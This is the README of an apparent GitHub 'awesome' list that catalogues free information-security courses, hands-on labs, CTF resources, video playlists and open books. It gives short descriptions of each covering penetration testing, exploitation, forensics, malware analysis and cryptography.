/awesome-infosec

A curated list of awesome infosec courses and training resources.

Awesome Infosec

Awesome

A curated list of awesome information security resources, inspired by the awesome-* trend on GitHub and my previous Coderwall publication.

The goal is to build a categorized community-driven collection of free resources focused on information security skill sets like:

  • Penetration Testing, Vulnerability Assessment
  • Computer Forensics, Malware Analysis, Reverse Engineering
  • Hardening, Honeypot Deployment, Network Security
  • Cryptography and Anonimity

Those resources and tools are intended only for cybersecurity professional and educational use in a controlled environment.

Table of Contents

  1. Massive Online Open Courses
  2. Academic Courses
  3. Laboratories
  4. Capture the Flag
  5. Open Security Books
  6. SecurityTube Playlists
  7. Related Awesome Lists
  8. Contributing
  9. License

Massive Online Open Courses

Stanford University - Computer Security

In this class you will learn how to design secure systems and write secure code. You will learn how to find vulnerabilities in code and how to design software systems that limit the impact of security vulnerabilities. We will focus on principles for building secure systems and give many real world examples.

Stanford University - Cryptography I

This course explains the inner workings of cryptographic primitives and how to correctly use them. Students will learn how to reason about the security of cryptographic constructions and how to apply this knowledge to real-world applications. The course begins with a detailed discussion of how two parties who have a shared secret key can communicate securely when a powerful adversary eavesdrops and tampers with traffic. We will examine many deployed protocols and analyze mistakes in existing systems. The second half of the course discusses public-key techniques that let two or more parties generate a shared secret key. We will cover the relevant number theory and discuss public-key encryption and basic key-exchange. Throughout the course students will be exposed to many exciting open problems in the field.

Stanford University - Cryptography II

This course is a continuation of Crypto I and explains the inner workings of public-key systems and cryptographic protocols. Students will learn how to reason about the security of cryptographic constructions and how to apply this knowledge to real-world applications. The course begins with constructions for digital signatures and their applications. We will then discuss protocols for user authentication and zero-knowledge protocols. Next we will turn to privacy applications of cryptography supporting anonymous credentials and private database lookup. We will conclude with more advanced topics including multi-party computation and elliptic curve cryptography.

University of Maryland - Usable Security

This course focuses on how to design and build secure systems with a human-centric focus. We will look at basic principles of human-computer interaction, and apply these insights to the design of secure systems with the goal of developing security measures that respect human performance and their goals within a system.

University of Maryland - Software Security

This course we will explore the foundations of software security. We will consider important software vulnerabilities and attacks that exploit them -- such as buffer overflows, SQL injection, and session hijacking -- and we will consider defenses that prevent or mitigate these attacks, including advanced testing and program analysis techniques. Importantly, we take a "build security in" mentality, considering techniques at each phase of the development cycle that can be used to strengthen the security of software systems.

University of Maryland - Cryptography

This course will introduce you to the foundations of modern cryptography, with an eye toward practical applications. We will learn the importance of carefully defining security; of relying on a set of well-studied "hardness assumptions" (e.g., the hardness of factoring large numbers); and of the possibility of proving security of complicated constructions based on low-level primitives. We will not only cover these ideas in theory, but will also explore their real-world impact. You will learn about cryptographic primitives in wide use today, and see how these can be combined to develop modern protocols for secure communication.

University of Maryland - Hardware Security

This course will introduce you to the foundations of modern cryptography, with an eye toward practical applications. We will learn the importance of carefully defining security; of relying on a set of well-studied “hardness assumptions” (e.g., the hardness of factoring large numbers); and of the possibility of proving security of complicated constructions based on low-level primitives. We will not only cover these ideas in theory, but will also explore their real-world impact. You will learn about cryptographic primitives in wide use today, and see how these can be combined to develop modern protocols for secure communication.

Cybrary - Online Cyber Security Training

Cyber Security jobs are growing three times faster than information technology jobs. However, this rapidly growing and very exciting industry lacks the number of skilled professionals required to handle the jobs. Some common jobs within Cyber Security include information assurance, security analyst, penetration tester, malware analyst/reverse engineering and Intel. With these types of opportunities available, aspiring or growing Cyber Security professionals should focus on continually increasing their skill set, because the Cyber Security industry never rests, it is continually changing. However, traditionally, Cyber Security classes are the most expensive training classes. As you know, that barrier to entry has been removed.

  • CompTIA Security+
    In this class you will gain a stable foundation of Cyber Security and Information Assurance as well as prepare for the security industry's most sought after entry level certification.

  • Cryptography
    Learn how to secure data communications through the use of cryptographic messaging and practices.

  • Ethical Hacking and Penetration Testing
    Learn the fundamentals of hacking and penetration testing. Think like a hacker, so that you can stop them from intruding into your systems. This class will help prepare you for the industries most sought after certification, EC-Council's CEH.

  • Computer and Hacking Forensics
    In order to catch cyber criminals, you have to learn how to retrace their steps and correctly acquire and document the evidence. Also prepare for the industry leading CHFI certification from the EC-Council.

  • CompTIA Advanced Security Practitioner (CASP)
    This advanced certification covers deep topics that span across both Cyber Security as well as Information Assurance.

  • ISACA Certified Information Systems Auditor (CISA)
    Become an expert in information systems auditing and controlling with this leading auditor certification from ISACA.

  • Certified Information Systems Security Professional (CISSP)
    The leading certification for Information Assurance management personnel. This course is both very deep, and very broad. Be ready to study hard!

  • Post Exploitation
    Learn what to do to maintain your presence and to gather intelligence after you have exploited the target system.

  • Social Engineering and Manipulation
    Take a look inside the form, function and flow of a highly skilled social engineering cyber-attack. Learn to protect the human element.

  • Python for Security Professionals
    Learn the commands and functions that every aspiring cyber security professional must know from Python. This isn't a full programming course, but rather a course designed for non-coders who are developing their career in security.

  • Metasploit
    An in-depth look inside the Metasploit Framework intended to show you how to use it to its full potential.

  • Malware Analysis and Reverse Engineering
    An introduction to reverse engineering malware. This class is for experienced Cyber Security professionals, generally at least two to three years in the field is preferred.

  • Advanced Penetration Testing by Georgia Weidman
    This class is for advanced Cyber Security professionals. You will learn in depth, hands-on, advanced hacking techniques to help you target and penetrate almost any highly secured environment.

SANS Cyber Aces

SANS Cyber Aces Online makes available, free and online, selected courses from the professional development curriculum offered by The SANS Institute, the global leader in cyber security training. SANS goal in making these courses available as open courseware is to help grow the talent pool and accelerate the rate at which skilled cyber professionals can enter the information security industry filling mission critical jobs currently going unfilled.

Open Security Training

  • Android Forensics & Security Testing
    This course will cover the most common issues facing mobile devices, and general tips for securing mobile applications. Upon completion of general mobile security overview, the course will delve into a proven practice in Mobile Device Forensics and Mobile Application Penetration Testing for Android devices. Over the two-day course, students will get hands-on time with open-source and commercial forensics tools, setup and explore reverse engineering development environments, and experience the process with which professional mobile security engineers have successfully applied to several projects. Areas covered include, identifying application vulnerabilities, code analysis, memory & file system analysis, and insecure storage of sensitive data.

  • Certified Information Systems Security Professional (CISSP)® Common Body of Knowledge (CBK)® Review
    The CISSP CBK Review course is uniquely designed for federal agency information assurance (IA) professionals in meeting NSTISSI-4011, National Training Standard for Information Systems Security Professionals, as required by DoD 8570.01-M, Information Assurance Workforce Improvement Program.

  • Flow Analysis & Network Hunting
    This course focuses on network analysis and hunting of malicious activity from a security operations center perspective. We will dive into the netflow strengths, operational limitations of netflow, recommended sensor placement, netflow tools, visualization of network data, analytic trade craft for network situational awareness and networking hunting scenarios.

  • Hacking Techniques and Intrusion Detection
    This course covers the most common methods used in computer and network hacking with the intention of learning how to better protect systems from such intrusions. These methods include reconnaissance techniques, system scanning, accessing systems by network and application level attacks, and denial of service attacks. During the course students will complete many hands on exercises.

  • Introductory Intel x86: Architecture, Assembly, Applications, & Alliteration
    Intel processors have been a major force in personal computing for more than 30 years. An understanding of low level computing mechanisms used in Intel chips as taught in this course serves as a foundation upon which to better understand other hardware, as well as many technical specialties such as reverse engineering, compiler design, operating system design, code optimization, and vulnerability exploitation.

  • Introductory Intel x86-64: Architecture, Assembly, Applications, & Alliteration
    Intel processors have been a major force in personal computing for more than 30 years. An understanding of low level computing mechanisms used in Intel chips as taught in this course serves as a foundation upon which to better understand other hardware, as well as many technical specialties such as reverse engineering, compiler design, operating system design, code optimization, and vulnerability exploitation.

  • Introduction to ARM
    ARM processors are becoming ubiquitous in mobile devices today with RISC processors making a comeback for their applications in low power computing environments. With major operating systems choosing to run on these processors including the latest Windows RT, iOS and Android, understanding the low level operations of these processors can serve to better understand, optimize and debug software stacks running on them. This class builds on the Intro to x86 class and tries to provide parallels and differences between the two processor architectures wherever possible while focusing on the ARM instruction set, some of the ARM processor features, and how software works and runs on the ARM processor.

  • Introduction to Cellular Security
    This course is intended to demonstrate the core concepts of cellular network security. Although the course discusses GSM, UMTS, and LTE - it is heavily focused on LTE. The course first introduces important cellular concepts and then follows the evolution of GSM to LTE.

  • Introduction to Network Forensics
    This is a mainly lecture based class giving an introduction to common network monitoring and forensic techniques. This class is meant to be accompanied by lab exercises to demonstrate certain tools and technologies, but the lab exercises are not absolutely necessary to convey the operating concepts.

  • Introduction to Secure Coding
    The purpose of this course is to provide developers with a short, focused primer related to secure coding. The hope is that each developer will leave the course with a better understanding of how they can improve, from a security perspective, the code that they write. This course provides a look at some of the most prevalent security related coding mistakes made in industry today. Each type of issue is explained in depth including how a malicious user may attack the code, and strategies for avoiding the issues are then reviewed. Knowledge of at least one programming language is required, although the specific programming language is not important as the concepts that will be discussed are language independent. The course will cover many of the weaknesses within the context of a web application, but most of the concepts will apply to all application development.

  • Introduction to Vulnerability Assessment
    This is a lecture and lab based class giving an introduction to vulnerability assessment of some common common computing technologies. Instructor-led lab exercises are used to demonstrate specific tools and technologies.

  • Introduction to Trusted Computing
    This course is an introduction to the fundamental technologies behind Trusted Computing. You will learn what Trusted Platform Modules (TPMs) are and what capabilities they can provide both at an in-depth technical level and in an enterprise context. You will also learn about how other technologies such as the Dynamic Root of Trust for Measurement (DRTM) and virtualization can both take advantage of TPMs and be used to enhance the TPM's capabilities. We will cover major use cases for trusted computing, including machine authentication, data protection, and attestation. This course will also introduce you to the various software resources that exist today to support TPMs, give a high-level overview of related research and development projects, and briefly discuss other trusted computing standards such as Trusted Network Connect which may be relevant to enterprise deployment of TPMs and trusted computing.

  • Offensive, Defensive, and Forensic Techniques for Determining Web User Identity This course looks at web users from a few different perspectives. First, we look at identifying techniques to determine web user identities from a server perspective. Second, we will look at obfuscating techniques from a user whom seeks to be anonymous. Finally, we look at forensic techniques, which, when given a hard drive or similar media, we identify users who accessed that server.

  • Pcap Analysis & Network Hunting
    Introduction to Packet Capture (PCAP) explains the fundamentals of how, where, and why to capture network traffic and what to do with it. This class covers open-source tools like tcpdump, Wireshark, and ChopShop in several lab exercises that reinforce the material. Some of the topics include capturing packets with tcpdump, mining DNS resolutions using only command-line tools, and busting obfuscated protocols. This class will prepare students to tackle common problems and help them begin developing the skills to handle more advanced networking challenges.

  • Malware Dynamic Analysis
    This introductory malware dynamic analysis class is dedicated to people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected via various tools. The class will be a hands-on class where students can use various tools to look for how malware is: Persisting, Communicating, and Hiding. We will achieve the items above by first learning the individual techniques sandboxes utilize. We will show how to capture and record registry, file, network, mutex, API, installation, hooking and other activity undertaken by the malware. We will create fake network responses to deceive malware so that it shows more behavior. We will also talk about how using MITRE's Malware Attribute Enumeration & Characterization (MAEC - pronounced "Mike") standard can help normalize the data obtained manually or from sandboxes, and improve junior malware analysts' reports. The class will additionally discuss how to take malware attributes and turn them into useful detection signatures such as Snort network IDS rules, or YARA signatures.

  • Secure Code Review
    This course is designed to help developers bring a secure coding mindset into typical project peer reviews. The course briefly talks about the development lifecycle and the importance of peer reviews in delivering a quality product. How to perform this review is discussed and how to keep secure coding a priority during the review is stressed. A variety of hands-on exercises will address common coding mistakes, what to focus on during a review, and how to manage limited time. Throughout the course, the class will break out into pairs and perform example peer reviews on sample code. Perl will be used for the hands-on exercises; however every attempt will be made to generalize the code such that anyone with an understanding of a coding language will be comfortable.

  • Smart Cards
    This course shows how smart cards are different compared to other type of cards. It is explained how smart cards can be used to realize confidentiality and integrity of information. Insight is given into the structure and operation of a smart card, the functionality of a smart card operating system and commonly used security mechanisms. In addition, an overview is given of developments in the field of chips (8, 16 and 32 bit architectures, co-processors), operating systems, virtual machines (Java Card, MULTOS), compatibility (PC / SC, Open Card, EMV) security evaluation (ITSEC, Common Criteria) and physical and logical attack methods (probing, SEM, FIB, DFA, DPA). Biometric identification and authentication using smart cards is dealt along with a summary of developments and (im) possibilities.

  • The Life of Binaries
    Along the way we discuss the relevance of security at different stages of a binary's life, from the tricks that can be played by a malicious compiler, to how viruses really work, to the way which malware "packers" duplicate OS process execution functionality, to the benefit of a security-enhanced OS loader which implements address space layout randomization (ASLR).

  • Understanding Cryptology: Core Concepts
    This is an introduction to cryptology with a focus on applied cryptology. It was designed to be accessible to a wide audience, and therefore does not include a rigorous mathematical foundation (this will be covered in later classes).

  • Understanding Cryptology: Cryptanalysis
    A class for those who want to stop learning about building cryptographic systems and want to attack them. This course is a mixture of lecture designed to introduce students to a variety of code-breaking techniques and python labs to solidify those concepts. Unlike its sister class, Core Concepts, math is necessary for this topic. Don't have a math degree? A basic understanding of algebra is sufficient - the mathematical principles that are necessary for understanding are included in the lecture. Knowledge of programming is also necessary, and knowledge of python is very helpful.

  • Introduction to Software Exploits (Exploits 1)
    Software vulnerabilities are flaws in program logic that can be leveraged by an attacker to execute arbitrary code on a target system. This class will cover both the identification of software vulnerabilities and the techniques attackers use to exploit them. In addition, current techniques that attempt to remediate the threat of software vulnerability exploitation will be discussed.

  • Exploits 2: Exploitation in the Windows Environment
    This course covers the exploitation of stack corruption vulnerabilities in the Windows environment. Stack overflows are programming flaws that often times allow an attacker to execute arbitrary code in the context of a vulnerable program. There are many nuances involved with exploiting these vulnerabilities in Windows. Window's exploit mitigations such as DEP, ASLR, SafeSEH, and SEHOP, makes leveraging these programming bugs more difficult, but not impossible. The course highlights the features and weaknesses of many the exploit mitigation techniques deployed in Windows operating systems. Also covered are labs that describe the process of finding bugs in Windows applications with mutation based fuzzing, and then developing exploits that target those bugs.

  • Intermediate Intel x86: Architecture, Assembly, Applications, & Alliteration
    Building upon the Introductory Intel x86 class, this class goes into more depth on topics already learned, and introduces more advanced topics that dive deeper into how Intel-based systems work. Example applications include showing how hardware and memory mechanisms are used for software exploits, anti-debug techniques, rootkit hiding, and direct hardware access for keystroke logging.

  • Advanced x86: Virtualization with Intel VT-x
    The purpose of this course is to provide a hands on introduction to Intel hardware support for virtualization. The first part will motivate the challenges of virtualization in the absence of dedicated hardware. This is followed by a deep dive on the Intel virtualization "API" and labs to begin implementing a blue pill / hyperjacking attack made famous by researchers like Joanna Rutkowska and Dino Dai Zovi et al. Finally a discussion of virtualization detection techniques.

  • Introduction to Reverse Engineering Software
    Throughout the history of invention curious minds have sought to understand the inner workings of their gadgets. Whether investigating a broken watch, or improving an engine, these people have broken down their goods into their elemental parts to understand how they work. This is Reverse Engineering (RE), and it is done every day from recreating outdated and incompatible software, understanding malicious code, or exploiting weaknesses in software.

  • Reverse Engineering Malware
    This class picks up where the Introduction to Reverse Engineering Software course left off, exploring how static reverse engineering techniques can be used to understand what a piece of malware does and how it can be removed.

  • Rootkits: What they are, and how to find them
    Rootkits are a class of malware which are dedicated to hiding the attacker's presence on a compromised system. This class will focus on understanding how rootkits work, and what tools can be used to help find them. This will be a very hands-on class where we talk about specific techniques which rootkits use, and then do labs where we show how a proof of concept rootkit is able to hide things from a defender.

  • The Adventures of a Keystroke: An in-depth look into keylogging on Windows
    Windows is designed to be compatible with a lot of devices which is why there are a lot of layers in the keystroke handling. The more layers a system has, the more probable it could be compromised by bad guys. There are more than 30 methods for capturing keystrokes from a Windows PC. Methods vary from simple user mode techniques to advanced ones such as IRP hooking. Class currently covers most of the user mode and kernel mode techniques including the undocumented ones which are not described anywhere else but there are still techniques which are not covered in the class such as Raw Input Devices. As for the hardware, we only cover PS/2 keyboards for the moment but documenting USB keyboards is one of the planned topics for near future.

Academic Courses

Florida State University's - Offensive Computer Security

The primary incentive for an attacker to exploit a vulnerability, or series of vulnerabilities is to achieve a return on an investment (his/her time usually). This return need not be strictly monetary, an attacker may be interested in obtaining access to data, identities, or some other commodity that is valuable to them. The field of penetration testing involves authorized auditing and exploitation of systems to assess actual system security in order to protect against attackers. This requires thorough knowledge of vulnerabilities and how to exploit them. Thus, this course provides an introductory but comprehensive coverage of the fundamental methodologies, skills, legal issues, and tools used in white hat penetration testing and secure system administration.

Florida State University's - Offensive Network Security

This class allows students to look deep into know protocols (i.e. IP, TCP, UDP) to see how an attacker can utilize these protocols to their advantage and how to spot issues in a network via captured network traffic. The first half of this course focuses on know protocols while the second half of the class focuses on reverse engineering unknown protocols. This class will utilize captured traffic to allow students to reverse the protocol by using known techniques such as incorporating bioinformatics introduced by Marshall Beddoe. This class will also cover fuzzing protocols to see if the server or client have vulnerabilities. Overall, a student finishing this class will have a better understanding of the network layers, protocols, and network communication and their interaction in computer networks.

NYU Polytechnic School of Engineering - ISIS Lab's Hack Night

Developed from the materials of NYU Poly's old Penetration Testing and Vulnerability Analysis course, Hack Night is a sobering introduction to offensive security. A lot of complex technical content is covered very quickly as students are introduced to a wide variety of complex and immersive topics over thirteen weeks.

Rensselaer Polytechnic Institute - Modern Binary Exploitation

This course will start off by covering basic x86 reverse engineering, vulnerability analysis, and classical forms of Linux-based userland binary exploitation. It will then transition into protections found on modern systems (Canaries, DEP, ASLR, RELRO, Fortify Source, etc) and the techniques used to defeat them. Time permitting, the course will also cover other subjects in exploitation including kernel-land and Windows based exploitation.

Rensselaer Polytechnic Institute - Hardware Reverse Engineering

Reverse engineering techniques for semiconductor devices and their applications to competitive analysis, IP litigation, security testing, supply chain verification, and failure analysis. IC packaging technologies and sample preparation techniques for die recovery and live analysis. Deprocessing and staining methods for revealing features bellow top passivation. Memory technologies and appropriate extraction techniques for each. Study contemporary anti-tamper/anti-RE methods and their effectiveness at protecting designs from attackers. Programmable logic microarchitecture and the issues involved with reverse engineering programmable logic.

City College of San Francisco - Sam Bowne Class

  • CNIT 120 - Network Security
    Knowledge and skills required for Network Administrators and Information Technology professionals to be aware of security vulnerabilities, to implement security measures, to analyze an existing network environment in consideration of known security threats or risks, to defend against attacks or viruses, and to ensure data privacy and integrity. Terminology and procedures for implementation and configuration of security, including access control, authorization, encryption, packet filters, firewalls, and Virtual Private Networks (VPNs).

  • CNIT 121 - Computer Forensics
    The class covers forensics tools, methods, and procedures used for investigation of computers, techniques of data recovery and evidence collection, protection of evidence, expert witness skills, and computer crime investigation techniques. Includes analysis of various file systems and specialized diagnostic software used to retrieve data. Prepares for part of the industry standard certification exam, Security+, and also maps to the Computer Investigation Specialists exam.

  • CNIT 123 - Ethical Hacking and Network Defense
    Students learn how hackers attack computers and networks, and how to protect systems from such attacks, using both Windows and Linux systems. Students will learn legal restrictions and ethical guidelines, and will be required to obey them. Students will perform many hands-on labs, both attacking and defending, using port scans, footprinting, exploiting Windows and Linux vulnerabilities, buffer overflow exploits, SQL injection, privilege escalation, Trojans, and backdoors.

  • CNIT 124 - Advanced Ethical Hacking
    Advanced techniques of defeating computer security, and countermeasures to protect Windows and Unix/Linux systems. Hands-on labs include Google hacking, automated footprinting, sophisticated ping and port scans, privilege escalation, attacks against telephone and Voice over Internet Protocol (VoIP) systems, routers, firewalls, wireless devices, Web servers, and Denial of Service attacks.

  • CNIT 126 - Practical Malware Analysis
    Learn how to analyze malware, including computer viruses, trojans, and rootkits, using disassemblers, debuggers, static and dynamic analysis, using IDA Pro, OllyDbg and other tools.

  • CNIT 127 - Exploit Development
    Learn how to find vulnerabilities and exploit them to gain control of target systems, including Linux, Windows, Mac, and Cisco. This class covers how to write tools, not just how to use them; essential skills for advanced penetration testers and software security professionals.

  • CNIT 128 - Hacking Mobile Devices
    Mobile devices such as smartphones and tablets are now used for making purchases, emails, social networking, and many other risky activities. These devices run specialized operating systems have many security problems. This class will cover how mobile operating systems and apps work, how to find and exploit vulnerabilities in them, and how to defend them. Topics will include phone call, voicemail, and SMS intrusion, jailbreaking, rooting, NFC attacks, malware, browser exploitation, and application vulnerabilities. Hands-on projects will include as many of these activities as are practical and legal.

  • Violent Python and Exploit Development
    In the exploit development section, students will take over vulnerable systems with simple Python scripts.

Laboratories

Pentester Lab

There is only one way to properly learn web penetration testing: by getting your hands dirty. We teach how to manually find and exploit vulnerabilities. You will understand the root cause of the problems and the methods that can be used to exploit them. Our exercises are based on common vulnerabilities found in different systems. The issues are not emulated. We provide you real systems with real vulnerabilities.

  • From SQL Injection to Shell
    This exercise explains how you can, from a SQL injection, gain access to the administration console. Then in the administration console, how you can run commands on the system.

  • From SQL Injection to Shell: PostgreSQL edition
    This exercise explains how you can from a SQL injection gain access to the administration console. Then in the administration console, how you can run commands on the system.

  • From SQL Injection to Shell II
    This exercise explains how you can, from a blind SQL injection, gain access to the administration console. Then in the administration console, how you can run commands on the system.

  • Web for Pentester
    This exercise is a set of the most common web vulnerabilities.

  • Web for Pentester II
    This exercise is a set of the most common web vulnerabilities.

  • PHP Include And Post Exploitation
    This exercice describes the exploitation of a local file include with limited access. Once code execution is gained, you will see some post exploitation tricks.

  • Linux Host Review
    This exercice explains how to perform a Linux host review, what and how you can check the configuration of a Linux server to ensure it is securely configured. The reviewed system is a traditional Linux-Apache-Mysql-PHP (LAMP) server used to host a blog.

  • Electronic Code Book
    This exercise explains how you can tamper with an encrypted cookies to access another user's account.

  • Rack Cookies and Commands injection
    After a short brute force introduction, this exercice explains the tampering of rack cookie and how you can even manage to modify a signed cookie (if the secret is trivial). Using this issue, you will be able to escalate your privileges and gain commands execution.

  • XSS and MySQL FILE
    This exercise explains how you can use a Cross-Site Scripting vulnerability to get access to an administrator's cookies. Then how you can use his/her session to gain access to the administration to find a SQL injection and gain code execution using it.

  • Axis2 Web service and Tomcat Manager
    This exercice explains the interactions between Tomcat and Apache, then it will show you how to call and attack an Axis2 Web service. Using information retrieved from this attack, you will be able to gain access to the Tomcat Manager and deploy a WebShell to gain commands execution.

  • Play Session Injection
    This exercise covers the exploitation of a session injection in the Play framework. This issue can be used to tamper with the content of the session while bypassing the signing mechanism.

  • Play XML Entities
    This exercise covers the exploitation of a XML entities in the Play framework.

  • CVE-2007-1860: mod_jk double-decoding
    This exercise covers the exploitation of CVE-2007-1860. This vulnerability allows an attacker to gain access to unaccessible pages using crafted requests. This is a common trick that a lot of testers miss.

  • CVE-2008-1930: Wordpress 2.5 Cookie Integrity Protection Vulnerability
    This exercise explains how you can exploit CVE-2008-1930 to gain access to the administration interface of a Wordpress installation.

  • CVE-2012-1823: PHP CGI
    This exercise explains how you can exploit CVE-2012-1823 to retrieve the source code of an application and gain code execution.

  • CVE-2012-2661: ActiveRecord SQL injection
    This exercise explains how you can exploit CVE-2012-2661 to retrieve information from a database.

  • CVE-2012-6081: MoinMoin code execution
    This exercise explains how you can exploit CVE-2012-6081 to gain code execution. This vulnerability was exploited to compromise Debian's wiki and Python documentation website.

  • CVE-2014-6271/Shellshock
    This exercise covers the exploitation of a Bash vulnerability through a CGI.

Syracuse University's SEED

Developing Instructional Laboratories for Computer SEcurity EDucation

People learn from mistakes. In security education, we study mistakes that lead to software vulnerabilities. Studying mistakes from the past not only help students understand why systems are vulnerable, why a "seemly-benign" mistake can turn into a disaster, and why many security mechanisms are needed. More importantly, it also helps students learn the common patterns of vulnerabilities, so they can avoid making similar mistakes in the future. Moreover, using vulnerabilities as case studies, students can learn the principles of secure design, secure programming, and security testing.

  • Software Security Labs
    These labs cover some of the most common vulnerabilties in general software. The labs show students how attacks work in exploiting these vulnerabilities.

  • Network Security Labs
    These labs cover topics on network security, ranging from attacks on TCP/IP and DNS to various network security technologies (Firewall, VPN, and IPSec).

  • Web Security Labs
    These labs cover some of the most common vulnerabilities in web applications. The labs show students how attacks work in exploiting these vulnerabilities.

  • System Security Labs
    These labs cover the security mechanisms in operating system, mostly focusing on access control mechanisms in Linux.

  • Cryptography Labs
    These labs cover three essential concepts in cryptography, including secrete-key encryption, one-way hash function, and public-key encryption and PKI.

  • All SEED Laboratories

Dr. Thorsten Schneider's Binary Auditing

Learn the fundamentals of Binary Auditing. Know how HLL mapping works, get more inner file understanding than ever. Learn how to find and analyse software vulnerability. Dig inside Buffer Overflows and learn how exploits can be prevented. Start to analyse your first viruses and malware the safe way. Learn about simple tricks and how viruses look like using real life examples.

NOWASP (Mutillidae)

OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiest. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMMP. It is pre-installed on SamuraiWTF, Rapid7 Metasploitable-2, and OWASP BWA. The existing version can be updated on these platforms. With dozens of vulns and hints to help the user; this is an easy-to-use web hacking environment designed for labs, security enthusiast, classrooms, CTF, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, corporate web sec training courses, and as an "assess the assessor" target for vulnerability assessment software.

Audi-1's SQLi-LABS

SQLi-LABS is a comprehensive test bed to Learn and understand nitti gritty of SQL injections and thereby helps professionals understand how to protect.

Capture the Flag

Vulnhub

We all learn in different ways: in a group, by yourself, reading books, watching/listening to other people, making notes or things out for yourself. Learning the basics & understanding them is essential; this knowledge can be enforced by then putting it into practice.

Over the years people have been creating these resources and a lot of time has been put into them, creating 'hidden gems' of training material. However, unless you know of them, its hard to discover them.

So VulnHub was born to cover as many as possible, creating a catalogue of 'stuff' that is (legally) 'breakable, hackable & exploitable' - allowing you to learn in a safe environment and practise 'stuff' out. When something is added to VulnHub's database it will be indexed as best as possible, to try and give you the best match possible for what you're wishing to learn or experiment with.

CTF Write Ups

  • CTF Resources
    A general collection of information, tools, and tips regarding CTFs and similar security competitions.

  • CTF write-ups 2015
    Wiki-like CTF write-ups repository, maintained by the community. (2015)

  • CTF write-ups 2014
    Wiki-like CTF write-ups repository, maintained by the community. (2014)

  • CTF write-ups 2013
    Wiki-like CTF write-ups repository, maintained by the community. (2013)

SecurityTube Playlists

Security Tube hosts a large range of video tutorials on IT security including penetration testing , exploit development and reverse engineering.

  • SecurityTube Metasploit Framework Expert (SMFE)
    This video series covers basics of Metasploit Framework. We will look at why to use metasploit then go on to how to exploit vulnerbilities with help of metasploit and post exploitation techniques with meterpreter.

  • Wireless LAN Security and Penetration Testing Megaprimer
    This video series will take you through a journey in wireless LAN (in)security and penetration testing. We will start from the very basics of how WLANs work, graduate to packet sniffing and injection attacks, move on to audit infrastructure vulnerabilities, learn to break into WLAN clients and finally look at advanced hybrid attacks involving wireless and applications.

  • Exploit Research Megaprimer
    In this video series, we will learn how to program exploits for various vulnerabilities published online. We will also look at how to use various tools and techniques to find Zero Day vulnerabilities in both open and closed source software.

  • Buffer Overflow Exploitation Megaprimer for Linux
    In this video series, we will understand the basic of buffer overflows and understand how to exploit them on linux based systems. In later videos, we will also look at how to apply the same principles to Windows and other selected operating systems.

Open Security Books

Crypto 101 - lvh

Comes with everything you need to understand complete systems such as SSL/TLS: block ciphers, stream ciphers, hash functions, message authentication codes, public key encryption, key agreement protocols, and signature algorithms. Learn how to exploit common cryptographic flaws, armed with nothing but a little time and your favorite programming language. Forge administrator cookies, recover passwords, and even backdoor your own random number generator.

A Graduate Course in Applied Cryptography - Dan Boneh & Victor Shoup

This book is about constructing practical cruptosystems for which we can argue security under plausible assumptions. The book covers many constructions for different tasks in cryptography. For each task we define the required goal. To analyze the constructions, we develop a unified framework for doing cryptographic proofs. A reader who masters this framework will capable of applying it to new constructions that may not be covered in this book. We describe common mistakes to avoid as well as attacks on real-world systems that illustratre the importance of rigor in cryptography. We end every chapter with a fund application that applies the ideas in the chapter in some unexpected way.

Reverse Engineering for Beginners - Dennis Yurichev

This book offers a primer on reverse-engineering, delving into disassembly code-level reverse engineering and explaining how to decipher assembly language for those beginners who would like to learn to understand x86 (which accounts for almost all executable software in the world) and ARM code created by C/C++ compilers.

CTF Field Guide - Trail of Bits

The focus areas that CTF competitions tend to measure are vulnerability discovery, exploit creation, toolkit creation, and operational tradecraft.. Whether you want to succeed at CTF, or as a computer security professional, you'll need to become an expert in at least one of these disciplines. Ideally in all of them.

Documentation

OWASP - Open Web Application Security Project

The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. Our mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks.

Applied Crypto Hardening - bettercrypto.org

This guide arose out of the need for system administrators to have an updated, solid, well re-searched and thought-through guide for configuring SSL, PGP,SSH and other cryptographic tools in the post-Snowdenage. Triggered by the NSA leaks in the summer of 2013, many system administrators and IT security officers saw the need to strengthen their encryption settings.This guide is specifically written for these system administrators.

Related Awesome Lists

  • Awesome Pentest
    A collection of awesome penetration testing resources, tools and other shiny things.

  • Awesome Appsec
    A curated list of resources for learning about application security.

  • Awesome Malware Analysis
    A curated list of awesome malware analysis tools and resources.

  • Android Security Awesome
    A collection of android security related resources.

  • Awesome CTF
    A curated list of CTF frameworks, libraries, resources and softwares.

  • Awesome Security
    A collection of awesome software, libraries, documents, books, resources and cools stuffs about security.

  • Awesome Honeypots
    A curated list of awesome honeypots, tools, components and much more.

  • Awesome PCAP Tools
    A collection of tools developed by other researchers in the Computer Science area to process network traces.

  • Awesome Android Security
    A collection of android security related resources.

  • Awesome Hacking
    A curated list of awesome Hacking tutorials, tools and resources.

Pull requests and issues with suggestions are welcome!

License

Creative Commons License

This work is licensed under a Creative Commons Attribution 4.0 International License.